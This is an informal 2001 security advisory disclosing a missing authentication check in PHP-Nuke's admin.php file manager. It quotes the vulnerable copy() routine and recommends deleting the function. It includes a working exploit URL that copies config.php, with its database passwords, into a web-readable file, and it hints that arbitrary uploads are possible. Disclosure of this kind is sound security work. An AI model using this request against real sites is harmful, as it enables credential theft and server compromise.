twlc security divison 24/09/2001 Php nuke BUGGED. Found by: LucisFero and supergate ./twlc Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files... Systems Affected all the versions ARE vulnerable except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is bugged) Explanation Do you need sql password? http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt the admin 'login' page will be prompted just go to http://www.server.net/images/hacked.txt and you will see config.php that as everyone knows contain the sql's passwords, you can even upload files...i leave you the 'fun' to find all the ways to use it... and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO LET YOU HAVE FUN. let me explain you the bug... admin.php contains this routine: $basedir = dirname($SCRIPT_FILENAME); $textrows = 20; $textcols = 85; $udir = dirname($PHP_SELF); if(!$wdir) $wdir="/"; if($cancel) $op="FileManager"; if($upload) { copy($userfile,$basedir.$wdir.$userfile_name); $lastaction = ""._UPLOADED." $userfile_name --> $wdir"; // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao //include("header.php"); //GraphicAdmin($hlpfile); //html_header(); //displaydir(); $wdir2="/"; chdir($basedir . $wdir2); //CloseTable(); //include("footer.php"); Header("Location: admin.php?op=FileManager"); exit; } that doesnt do a check to see if you are logged as admin or no... so you can use it anyway... Solution we erased the function... cause we wanted to remove the file manager anyway but i suggest you to do the same... -to upload files use FTP- conclusions: yet another bug of php nuke... this software is used by thousands of people... (we run something based on it too) i hope that this time the author will reply soon and will release a patch too! as i said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories. Prolly the funny thing is that who first discovered the bug was LucisFero that... 2 hours before didnt knew php ... so i (supergate) fear him and you should too. posted at: http://www.twlc.net article http://www.twlc.net/article.php?sid=421 bugtraq@securityfocus.com http://www.phpnuke.org -good luck- http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System and of course mailed to the author of php nuke contacts (bugs, ideas, insults, cool girls... remember that trojans are directed to /dev/null): lucisfero@twlc.net supergate@twlc.net http://www.twlc.net (yes we are patched) peace out pimps. bella a tutti. eof
